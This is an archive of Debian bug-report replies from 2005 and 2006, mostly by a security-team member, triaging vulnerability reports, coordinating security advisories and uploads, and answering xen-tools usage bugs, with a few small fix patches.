  Daniel if you have a preferred patch that would be appreciated,
 otherwise I'll come up with a solution and add it to this bug.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#394637: gaim-encryption plugin does not load

[Steve Kemp]

On Sun, Oct 22, 2006 at 01:08:18PM +0200, Jan Strnad wrote:

> Package: gaim-encryption
> Version: 3.0~beta5-3
> Severity: critical
> Tags: security
> Justification: root security hole

  This doesn't appear to have any security implications.  Certainly
 not a root hole.

  Sure you could argue that not having encryption is a security
 issue; but installing this package will not cause your machine to
 become vulnerable in any realistic fashion.

  Please re-classify accordingly.

Steve
-- 


signature.asc
Description: Digital signature

Bug#381376: Status of CVE-2006-3918 #381376

[Steve Kemp]

On Sat, Sep 09, 2006 at 01:22:25PM +0200, Stefan Fritsch wrote:
> On Saturday 09 September 2006 12:35, Lo?c Minier wrote:
> >  I think only apache was uploaded for CVE-2006-3918, and not
> > apache2. Do you intend to issue a DSA for apache2 as well?  Or
> > isn't it affected by the vulnerability?
> >
> >  This is fixed in apache2 >= 2.0.55-4.1 in unstable.
> 
> The issue is less severe for apache2 because it is much more difficult 
> to exploit: apache2 will first wait for the request timeout (usually 
> 5 minutes) before sending the problematic error message.

  I have a pending upload of Apache2 for this, but I've been
 unexpectantly busy.  I did intend it to be a day or two after
 the apache update.

  All being well I'll get it released tomorrow.  If not it will
 have to be midweek.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#380231: [CVE-2006-3747] Off-by-one flaw exists in the Rewrite module, mod_rewrite

[Steve Kemp]

On Fri, Jul 28, 2006 at 05:06:38PM +0200, Daniel Leidert wrote:

> The latest release notes [1] of apache 1.3.37, 2.0.59 and 2.2.3 contains a
> note, about an off-by-one flaw (CVE-2006-3747 [2]).
> 
> [1] http://www.apache.org/dist/httpd/Announcement2.2.html
> [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747
> 
> Please check, if the Debian package(s) is/are vulnerable.

  apache + apache2 packages are affected.  DSA in preparation.

  Thanks for the report.

  (Please see also #380182)

Steve
-- 


signature.asc
Description: Digital signature

Bug#380182: Confirmed

[Steve Kemp]

  A security advisory is pending.

  This bug applies to both the apache and apache2 packages.  Same 
 fix in both packages, but in different locations...

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#379174: Shadow security update for CVE-2006-3378

[Steve Kemp]

On Sun, Jul 23, 2006 at 06:16:00PM +0200, Christian Perrier wrote:
> Hello dear Security team (and ftpmasters, and shadow package maintainers),
> 
> Being back from 2 days holiday I discover CVE-2006-3378 which has just
> been revealed to our attention (#359174 in the BTS).

  I guess you mean #379174 here?

> What I propose to you, as soon as we have a fix for CVE-2006-3378:
> 
> 
> -urgently destroy 4.0.3-31sarge6 and 31sarge7 from the
>  proposed-updates queue. Need ftpmasters collaboration with high urgency
> -the security team, or the shadow package team, prepares
>  4.0.3-31sarge6 with the fix for CVE-2006-3378 *ALONE*
> -the shadow package team prepares 4.0.3-31sarge7 with BOTH updates and
>  sends it to the proposed-updates queue so that it can be picked by the
>  SRM team when they're ready to update sarge
> 

  Sounds fine from the security point of view.  Once a patch is
 available at least.

Steve
-- 


signature.asc
Description: Digital signature

Bug#379347: xen-tools: xen-create image fails at xt-create-image

[Steve Kemp]

On Sun, Jul 23, 2006 at 01:27:51AM +0200, Henning Sprang wrote:

> Actually, that helped, as said before, but it is not clear, or even
> evident, that --debootstrap/--rpmstrap must be given from the manpage,

  I think it is - from "man xen-create-image":

--cut--

INSTALLATION METHODS
 The new guest images may be installed in several different ways:

 1.  With the B command.
 2.  With the B command.
 3.  By copying an existing installation.
 4.  By untarring a file containing a previous installation.

 These different methods can be selected by either the command line
arguments, or settings in the configuration file.

--cut--

  (Hmm that should be "--debootstrap" option", and "--rpmstrap option" 
respectively.  Will update that.)

> and it also seems unreasonable - you can't install sarge/etch with
> rpmstrap, and you can't install centos or fedora with debootstrap. Bu
> maybe you are working on a secret dpkg for centos?! :)

  I guess that is true - but you might want to install "sarge" by untarring, or 
 copying a previously created image.  So "dist=sarge" cannot be assumed to
 mean "debootstrap".

  Thats the main reason why these are distinct, and mutually exclusive, 
 options.

> Severity still important in my opionion because the tool isn't useable
> without major tweaking around with all the options.

  I will update the code to ensure at least one option is supplied for
 the installation method, which I will regard as closing this bug.

  (ie in your example it would output a message and exit:

"please choose one of the following options:
--debootstrap - Install with debootstrap
--rpmstrap- Install the dist with rpmstrap
--copy- Copy from the selected directory .. etc")

 
  However I disagree utterly with the "major tweaking", because this
 option could be specified in the configuration file as the comments
 indicate.

  I have to assume that people attempting to use software will examine
 the configuration file.  Otherwise you could claim that apt-get is
 broken because the default configuration file doesn't point to a 
 local mirror without "major tweaking".

  .. still I'm glad you got it working now :)

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#379347: further tests - no success

[Steve Kemp]

On Sun, Jul 23, 2006 at 01:03:33AM +0200, Henning Sprang wrote:

> I also tried the same with a loopback dislk image - no success.

  OK that is good to know.

> I do exactlky what is documented, and have no idea how to investigate
> the problem further.

  I've given you things to try.  The most obvious is adding
 "--dist=sarge --debootstrap".

  If that fails too then add "--verbose" so that all the diagnostics
 are available.

> Let me know what I can try to give more help on solving this bug.

  I have.  Twice now.

> Maybe the call to the external program should not be made in a way that
> analyhzingf problems is impossible, and there should be a way to keep
> the tmp data.

  You can, it is stored in the LVM file you specified.  Simply mount it.

  (If you used the loopback image you could also mount that after the
 failure occurs).


Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#379347: xen-tools: xen-create image fails at xt-create-image

[Steve Kemp]

On Sun, Jul 23, 2006 at 12:42:28AM +, Henning Sprang wrote:
> Package: xen-tools
> Version: 2.1-3
> Severity: grave
> Justification: renders package unusable

  Grave seems a little extreme since the package clearly works for
 some.  However I'm happy to leave it there for a day or two at
 least until I can update documentation to be better.

> when running 
>  xen-create-image --size=5Gb --swap=1024Mb --dhcp --lvm=virtualmachines 
> --hostname=fasel --kernel=/boot/vmlinuz-2.6.16-xen 
> --initrd=/boot/initrd-2.6.16-xen.img --force

  It looks like you're missing an installation method.  Please add:

--dist=sarge --debootstrap

  This might be all you need. 

  It isn't clear whether you've modified the global configuration
 file /etc/xen-tools/xen-tools.conf, I will assume you haven't since 
 if you had you could have setup the various options that you've specified 
 there.

> --- start message ---
> Creating ext3 filesystem on /dev/virtualmachines/fasel-disk
> Done
> 
> Installing your system with Running command '/usr/bin/xt-install-image 
> --location=/tmp/MqrYmFUWft --dist=sarge --cache=yes >/dev/null 2>/dev/null' 
> failed.
> --- end message ---

  This means it made the filesystems, etc, but failed to install with
 debootstrap/rpmstrap/copy/tar.  That could be because you didn't 
 specify one of those options, or it might be bacuse one was specified
 in the configuration file but failed for some reason.

  I can't really tell just yet.


> Unfortunately, this message doesn't give any hint what could be done better, 
> and trying to run the given command to try to get more
> information doesn't help, because the temporary diretory is removed already.

  Indeed the temporary directory has been removed, but you can create
 it and mount the previously created image from /dev/virtualmachines/fase1-disk
 if you do wish to explore.


> No idea how this package should be used.

  It seems you do have a reasonable idea, it is just unfortunate that
 this invocation didn't proceed correctly.  Running "man
 xen-create-image" might have been useful since it does cover the
 usage of the different installation methods, and the specification
 of the distribution you wish to install ..

  I'd suggest that you repeat the command with "--dist=sarge
 --debootstrap" as an initial step.  If that fails, or if you
 wish to generate more output please add "--verbose" and 
 send the log to this bug report.


Steve
-- 
http://www.steve.org.uk/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#372531: Update of wzdftpd 0.5.2-1.1sarge1 for 3.1r3

[Steve Kemp]

On Tue, Jul 04, 2006 at 02:39:00PM +0200, Pierre Chifflier wrote:
> On Tue, Jul 04, 2006 at 02:30:10PM +0200, Julien Danjou wrote:
> > Hello,
> > 
> > The fix for DSA-1006-1 on wzdftpd broke dependencies as explained in bug
> > report #372531.
> > We would like to see this bug fixed in the next stable point-release.
> > 
> > Would it be possible to the security team to fix this package or maybe to 
> > the
> > maintainer to upload a new and fixed version of its package?
> > 
> > Please, keep us in touch, since we plan to point-release ASAP.
> > 
> 
> Hi,
> 
> Since the debian/control files uses only depends like:
> wzdftpd (= ${Source-Version})
> a simple rebuild should fix the problem.

  If you're not expectng a new advisory then building it yourself
 would be appreciated.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#372719: regression in FreeType security fix for DSA-1095

[Steve Kemp]

On Sun, Jun 25, 2006 at 03:09:51PM -0700, Steve Langasek wrote:

> As mentioned earlier this month, a regression was found in the freetype
> 2.1.7-2.5 package uploaded for DSA-1095 which caused applications to crash
> with division-by-zero errors.  I've prepared a maintainer upload to fix
> this regression using the patch from bug #373581, which can be found at
> .
> 
> Can I upload this to security.d.o for a revised DSA?

  Yes, please do.

Steve
-- 


signature.asc
Description: Digital signature

Bug#375267: xen-tools: FTBFS: Test failures

[Steve Kemp]

On Sat, Jun 24, 2006 at 05:21:32PM -0400, Daniel Schepler wrote:

> From my pbuilder build log:

  Good catch, thanks for reporting it.

> ...
> tests/getopt..ok 1 - File exists: ./bin/xen-create-image
> ok 2 - File is executable
> Cannot read file '/etc/xen-tools/xen-tools.conf' - No such file or directory 
> at ./bin/xen-create-image line 736.

  OK this is a stupid error on my part.

  What is happening here is that we attempt to run the following
 command:

./bin/xen-create-image --help

  This is done specifically so that we can capture the options
 which are allegedly supported by the tool.  Then we can actually
 ensure that every option advertised is actually available/used.

  This test was added recently as a result of:

#374987:  --fs is a unknown option

  However since the software isn't installed it aborts on
 failing to read the configuration file.  Typically I'd just
 add a "--test" flag, but that won't work in this case since
 we expect to read the configuration file and *then* parse the
 command line arguments!

  I will update the test shortly to avoid this execution.

  In the mean time removing "make test" from the debian/rules file
 will allow it to build... although this is clearly not an ideal
 solution.

  The test suite should be runnable without the software being installed
 and it mostly is...


Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#374181: leaks potentialy sensitive information (e.g. passwords) to www.google.com

[Steve Kemp]

On Sat, Jun 17, 2006 at 10:30:40PM +0200, Robert Millan wrote:

> Thanks, it seems disabling "middlemouse.contentLoadURL" gets rid of the
> problem.  Could you make this the default?

  I think that is up to either 

a) Firefox upstream

b) The Debian firefox maintainers

  It certainly isn't the responsability of the Security Team, so I'm
 not going to argue for or against.

Steve
-- 


signature.asc
Description: Digital signature

Bug#374181: leaks potentialy sensitive information (e.g. passwords) to www.google.com

[Steve Kemp]

On Sat, Jun 17, 2006 at 08:01:22PM +0200, Robert Millan wrote:
> Package: firefox
> Severity: grave
> Tags: security

  Not a security bug.

> When pasting using X11 clipboard to a firefox window, unless the focus is in a
> specific place like the navigation bar or an edit box, it'll assume you want 
> to
> go to "keyword:$clipboard", which happens to be an alias for google "I'm 
> feeling
> lucky" search.

  This can be disabled.  Open "about:config" in your address bar, and
 enter "middle" in the filter window.  Click "show all" and you can
 disable various middle-click options.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#370544: security.debian.org: virus netbot spam sending DNS squatting

[Steve Kemp]

On Mon, Jun 05, 2006 at 09:26:55PM +0200, Yves Jean Marie Lambert wrote:
> Package: security.debian.org
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> "Enlarge your d1ck" spammers are using a security hole in debian :

  Which security hole?

> all zombified system I have tested are running apache 2.054/debian PHP 
> 4.3.10.16
> the payload of the trojan began about on may the 23th - I could manage and 
> fill
> informations about that at that date, I'm sorry not to have done that before. 
> see 

  All you've shown (told us) is that you have some compromised machines
 running PHP, Apache + Debian.  That is nowhere near enough to help
 resolve this and see if it is a Debian security issue or not.

  I'm tempted to just write it off as a security hole in a non-Debian
 PHP application, but more investigation would rule that out (or not).

  If you believe this is a Debian issue please:

1.  Tell us which version(s) of Debian are involved.

2.  Show which packages are installed.

3.  List any non-Debian locally installed PHP applications.

4.  Show us detailed HTTP logs that correspond to the attacks.

  I hope that isn't too harsh, but you've given us to little information to
 investigate even casually.

Steve
-- 


signature.asc
Description: Digital signature

Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution

[Steve Kemp]

On Tue, May 30, 2006 at 07:14:11PM +0200, Jeroen van Wolffelaar wrote:
> On Tue, May 30, 2006 at 09:55:16AM +0200, Thijs Kinkhorst wrote:
> > On Sun, 2006-05-28 at 22:11 +0100, Steve Kemp wrote:
> > >   Uploaded.
> > 
> > Thanks! But... can't find the upload anywhere? Maybe something went
> > wrong or am I looking the wrong way?
> 
> I got a 'upload removed due to not being signed by gnupg/gpg' mail. So,
> it looks like something went wrong. 

  Strange.  I don't remember noticing an upload error, or a signing
 error.

  I've resigned + reuploaded for you.  If it works great, if not
 I guess test that network access ;)

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution

[Steve Kemp]

On Sun, May 28, 2006 at 11:02:18PM +0200, Thijs Kinkhorst wrote:
> On Tue, 2006-05-23 at 12:36 +0200, Thijs Kinkhorst wrote:
> > Problem is that Jeroen announced that he's on a trip through Mexico
> > now,
> > so I'm left without someone to upload. Maybe the (testing) security
> > team
> > or any other DD interested in getting this bug fixed, can take a look
> > and upload?
> > 
> > Please find the updated packages here:
> > http://www.a-eskwadraat.nl/~kink/phpbb/
> 
> Still looking for an uploader here... thanks.

  Uploaded.

Steve
-- 

> 
> 
> Thijs



> ___
> Secure-testing-team mailing list
> Secure-testing-team@lists.alioth.debian.org
> http://lists.alioth.debian.org/mailman/listinfo/secure-testing-team


-- 
Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit



signature.asc
Description: Digital signature

Bug#360657: passwd SIGSEGV on empty password

[Steve Kemp]

On Mon, Apr 03, 2006 at 10:59:32PM +0200, Matteo Croce wrote:
> Package: passwd
> Version: 1:4.0.14-9
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> Just press ^D instead of the new password and passwd will segfaults.
> I think that this is grave because it's set uid root.

  Interestingly this only happens upon my Sid machine.

  Upon Sarge it works as expected:

[EMAIL PROTECTED]:~$ passwd
Changing password for skx
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
passwd: Authentication token manipulation error


  On unstable it behaves as you describe:

[EMAIL PROTECTED]:~$ passwd
Changing password for skx
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
Segmentation fault

  Under gdb I see this:

Retype new UNIX password: 

Program received signal SIGSEGV, Segmentation fault.
0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so

(gdb) bt
#0  0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so
#1  0xb7fa9a9a in _pam_dispatch () from /lib/libpam.so.0
#2  0xb7fabfa3 in pam_chauthtok () from /lib/libpam.so.0
#3  0x0804b1df in ?? ()
#4  0x08052388 in ?? ()
#5  0x in ?? ()


  Unfortunately I don't have time tonight to investigate, but it
 looks like it is a pam_unix.so / libpam.so bug, rather than a
 passwd bug.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#350964: CVE-2006-0225, scponly shell command possible

[Steve Kemp]

On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote:

> This bug has been closed for unstable (see bug 350964) with the 4.6
> upload, but will it be fixed for sarge?

  Please see DSA-969-1 released two days ago:

http://www.us.debian.org/security/2006/dsa-969

  Sarge is fixed.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#349555: komi - FTBFS: cannot find -lgp

[Steve Kemp]

On Wed, Jan 25, 2006 at 12:29:32PM +0100, Thierry Reding wrote:
> * Bastian Blank wrote:

> > Package: komi
> > Version: 1.03-4
> > Severity: serious
> > 
> > There was an error while trying to autobuild your package:
> > 

> I've investigated this a bit, and it looks like the upstream Makefile links
> statically against SDL. I've tried rebuilding with dynamic linking and it
> solves the FTBFS.
> 
> Any reason why komi would link statically against SDL? Steve? If not, maybe
> the attached patch should be applied.

  I see nothing wrong with this patch.  (Although I'm wondering why
 this build failure didn't manifest itself previously..?)

  If you wish to upload a fixed package feel free.  Otherwise I'll
 do it tomorrow evening.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#349283: tor: Tor security advisory: hidden services can be located quickly

[Steve Kemp]

On Sat, Jan 21, 2006 at 07:17:36PM -0500, Chris Howie wrote:
> Package: tor
> Version: 0.1.0.16-1
> Severity: grave
> Tags: security
> Justification: user security hole

  Tor isn't included in a Debian stable release, so no need for
 a DSA.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#346101: Strace log not being accepted

[Steve Kemp]

On Wed, Jan 11, 2006 at 03:46:19PM -0600, Bonilla, Alejandro wrote:
> I have sent the strace of apachetop and the bug system is not letting it
> in, maybe as an spam check?
> 
> Here goes again attached.

  Cheers, got it.

  Looks like I tracked down the bug without this.  See :

http://lists.debian.org/debian-devel/2006/01/msg00648.html

  The proble appears to be that a structure is allocated and not
 initialized to NULL, so an invalid free appears.

  The fix is in the message linked to above - and I'll upload a 
 new revision shortly.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#347221: smstools: Format string attack in logging code

[Steve Kemp]

Package: smstools
Version: 1.16-1+b1
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  A DSA has just been released for smstools due to an insecure
 usage of syslog in the logging code.

  The following patch will correct the issue:

--- smstools-1.14.8.orig/src/logging.c
+++ smstools-1.14.8/src/logging.c
@@ -78,7 +78,7 @@
   va_end(argp);
   if (Filehandle<0)
   {
-syslog(severity,text);
+syslog(severity,"%s",text);
   }
   else
   {


Steve
--

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12.6-xen
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)

Versions of packages smstools depends on:
ii  libc6 2.3.5-11   GNU C Library: Shared libraries an
ii  libmm14   1.4.0-1Shared memory library - runtime

smstools recommends no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

[Steve Kemp]

On Fri, Dec 23, 2005 at 05:56:59PM +0100, Wouter van Heyst wrote:

> >   It looks good to me.  I've built a package and if nobody has any 
> >  objections I'll upload later today.
> 
> No objections from me.

  Great I already uploaded the package ;)

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

[Steve Kemp]

On Fri, Dec 23, 2005 at 12:10:00AM +0100, Florian Ernst wrote:

> Steve, btw, any news on CVE-2005-3302 aka bug#330895 (arbitrary code
> execution when importing a .bvh file)? Last I heard you were going to
> prepare an update unless anybody had an issue with the changes made,
> yet I haven't heard of any such issues (or anything at all, to be
> precise) since then...

  Utterly slipped my mind.  :(

> FWIW, I've put together an update for Sarge's version of the blender
> package based on the upstream change mentioned above, please find
> attached a cumulative interdiff for both CVE-2005-3302 aka bug#330895
> and this bug so these issues can be resolved for Sarge.

  Great, thanks a lot.

> Please tell whether you deem those patches sufficient for a potential
> future security advisory, and if not, please provide pointers at what
> might be missing.

  It looks good to me.  I've built a package and if nobody has any 
 objections I'll upload later today.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

[Steve Kemp]

On Thu, Dec 22, 2005 at 02:30:46PM +0100, Moritz Muehlenhoff wrote:

> An integer overflow in the header parser for .blend files can potentially
> be exploited to execute code through a heap overflow. Please see 
> http://www.overflow.pl/adv/blenderinteger.txt for details.
> 
> This is CVE-2005-4470.

  Woody is non-free so most likely won't get updated.

  Sarge is vulnerable.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#342550: firefox: Javascript, history.dat & DoS

[Steve Kemp]

On Thu, Dec 08, 2005 at 04:48:07PM +0200, Timo Poikola wrote:
> Package: firefox
> Version: 1.4.99+1.5rc3.dfsg-2
> Severity: grave
> Tags: security
> Justification: causes non-serious data loss
> 
> http://packetstormsecurity.org/0512-exploits/firefox-1.5-buffer-overflow.txt
> 
> My ff does not crashed, but it ate really much cpu-time when I tested 
> slightly modified version of javascript. 

  Not a security issue, "just" a DOS attack.

  Mozilla.org do not regard DOS attacks as security issues, so we cannot
 either.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#340284: mozilla-firefox: "su root -c firefox" gives root access to any other firefox loaded.

[Steve Kemp]

On Tue, Nov 22, 2005 at 12:36:46PM +0100, S. Thommerel wrote:

> To reproduce this bug:
> 
>  su root and then load firefox from the term. Then launch firefox from
>  another unrelated and normal user terminal. The newly launched firefox reads 
> root's
>  profile and gets root's rights.

  Isn't this expected behaviour from Firefox?  When invoking new copies
 it doesn't spawn an independent new instance, instead it connects to
 the already-running instance?

  I guess it's a security hole in a sense...

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#340079: insecure tempfiles

[Steve Kemp]

On Sun, Nov 20, 2005 at 08:17:17PM +0100, Uwe Zeisberger wrote:

> Tags: security patch

> With the attached patch applied, it uses mktemp for their creation.

  The patch is .. missing.

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code

[Steve Kemp]

On Wed, Nov 16, 2005 at 02:05:11PM +0100, Loic Minier wrote:
>  Security team, did you start work on CVE-2005-3186 and CVE-2005-2975,
>  CVE-2005-2976 (not described in this report)?  Ubuntu has released some
>  packages which might help .

>  Do you need the Gtk maintainers to prepare an upload for stable?

  That would certainly be appreciated.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#338312: osh: Environment Variable Input Validation Bug

[Steve Kemp]

On Wed, Nov 09, 2005 at 04:42:08AM -0800, Charles Stevenson wrote:

> Due to a bug in the environment variable substitution code it is
> possible to inject environment variables such as LD_PRELOAD and gain a
> root shell.

  Confirmed.

  Joey we'll need an ID for it.
  
  I guess we need to use two buffers to handle the expansion correctly...

Steve
--

Bug#328129: PATCH: The following patch fixes this issue

[Steve Kemp]

  The following patch extracted from the SF.net discussion linked
 above fixes the issue for me.

Steve
--

--- xine-ui-0.99.3.orig/src/xitk/menus.c
+++ xine-ui-0.99.3/src/xitk/menus.c
@@ -425,8 +425,7 @@
   int  x, y;
   xitk_menu_widget_t   menu;
   char buffer[2048];
-  char*sh[255];
-  int  shc = 0;
+  int  i;
   xitk_widget_t   *w;
 #ifdef HAVE_XINERAMA
   int  fullscr_mode = (FULLSCR_MODE | FULLSCR_XI_MODE);
@@ -439,15 +438,15 @@
   "",  
   NULL, NULL   
  },
 { _("Show controls"),
-  (sh[shc++] = menu_get_shortcut("ToggleVisibility")),
+  menu_get_shortcut("ToggleVisibility"),
   panel_is_visible() ? "" : "",  
   menu_panel_visibility, NULL  
  },
 { _("Show video window"),
-  (sh[shc++] = menu_get_shortcut("ToggleWindowVisibility")),
+  menu_get_shortcut("ToggleWindowVisibility"),
   video_window_is_visible() ? "" : "",  
   menu_video_ctrl, (void *) VIDEO_TOGGLE   
  },
 { _("Fullscreen"),
-  (sh[shc++] = menu_get_shortcut("ToggleFullscreen")),
+  menu_get_shortcut("ToggleFullscreen"),
   (video_window_get_fullscreen_mode() & fullscr_mode) ? "" : 
"",
   menu_video_ctrl, (void *) VIDEO_FULLSCR  
  },
 { "SEP",  
@@ -459,7 +458,7 @@
   "",   
   NULL, NULL   
  },
 { _("Open/File..."),
-  (sh[shc++] = menu_get_shortcut("FileSelector")),
+  menu_get_shortcut("FileSelector"),
   NULL,
   menu_file_selector,NULL  
  },
 { _("Open/Playlist..."),
@@ -467,7 +466,7 @@
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_LOAD  
  },
 { _("Open/Location..."),
-  (sh[shc++] = menu_get_shortcut("MrlBrowser")),
+  menu_get_shortcut("MrlBrowser"),
   NULL,
   menu_mrl_browser, NULL   
  },
 { _("Playback"),
@@ -475,15 +474,15 @@
   "",
   NULL, NULL   
  },
 { _("Playback/Play"),
-  (sh[shc++] = menu_get_shortcut("Play")),
+  menu_get_shortcut("Play"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PLAY  
  },
 { _("Playback/Stop"),
-  (sh[shc++] = menu_get_shortcut("Stop")),
+  menu_get_shortcut("Stop"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_STOP  
  },
 { _("Playback/Pause"),
-  (sh[shc++] = menu_get_shortcut("Pause")),
+  menu_get_shortcut("Pause"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PAUSE 
  },
 { _("Playback/SEP"),
@@ -491,11 +490,11 @@
   "",  
   NULL,  NULL  
  },
 { _("Playback/Next MRL"),
-  (sh[shc++] = menu_get_shortcut("NextMrl")),
+  menu_get_shortcut("NextMrl"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_NEXT  
  },
 { _("Playback/Previous MRL"),
-  (sh[shc++] = menu_get_shortcut("PriorMrl")),
+  menu_get_shortcut("PriorMrl"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PREV  
  },
 { _("Playback/SEP"),
@@ -503,11 +502,11 @@
   "",  
   NULL,  NULL  
  },
 { _("Playback/Increase Speed"),
-  (sh[shc++] = menu_get_shortcut("SpeedFaster")),
+  menu_get_shortcut("SpeedFaster"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_SPEEDM
  },
 { _("Playback/Decrease Speed"),
-  (sh[shc++] = menu_get_shortcut("SpeedSlower")),
+  menu_get_shortcut("SpeedSlower"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_SPEEDL
  },
 { _("Playlist"),
@@ -523,7 +522,7 @@
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_LOAD  
  },
 { _("Playlist/Editor..."),
-  (sh[shc++] = menu_get_shortcut("PlaylistEditor")),
+  menu_get_shortcut("PlaylistEditor"),
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_EDIT  
  },
 { _("Playlist/SEP"),  
@@ -555,7 +554,7 @@
   (gGui->playlist.loop == PLAYLIST_LOOP_SHUF_PLUS) ? "" : 
"",
   menu_playlist_ctrl, (void *) PLAYL_SHUF_PLUS 
  },
  

Bug#335817: wordpress: SECURITY : Contains an insecure version of class.snoopy

[Steve Kemp]

Package: wordpress
Version: 1.5.2-2
Severity: grave
Justification: user security hole


  As described upon the following bugtraq post the class Snoopy which
 is included in wordpress potentially allows arbitary command execution.

http://seclists.org/lists/fulldisclosure/2005/Oct/0536.html

  The class is contained within the wordpress distribution - although
 I haven't explicitly told them yet, I leave it to you to give them
 a nod.

Steve
--
  

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-k7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#335439: vncserver: passwords over 8 chars not handled correctly

[Steve Kemp]

On Sun, Oct 23, 2005 at 08:19:35PM -0400, Collin E Borrlewyn wrote:

> vncserver lets me in without supplying the full password.
> 
> To reproduce this:
> start vncserver: vncserver :1
> whe prompted enter a password of eight or more characters
> start xvncviewer and connect to :1
> when prompted enter the first eight characters of the password and hit enter
> You have been authenticated.

  This appears to be a known weakness in VNC, for which I can find
 references going back to 1999.

  e.g.

http://www.realvnc.com/pipermail/vnc-list/1999-November/010853.html


  The source documents this:

vnc-3.3.7/vncpasswd/vncpasswd.c

  "Always ignore anything after 8 characters, since this is what Solaris 
getpass() does anyway.".


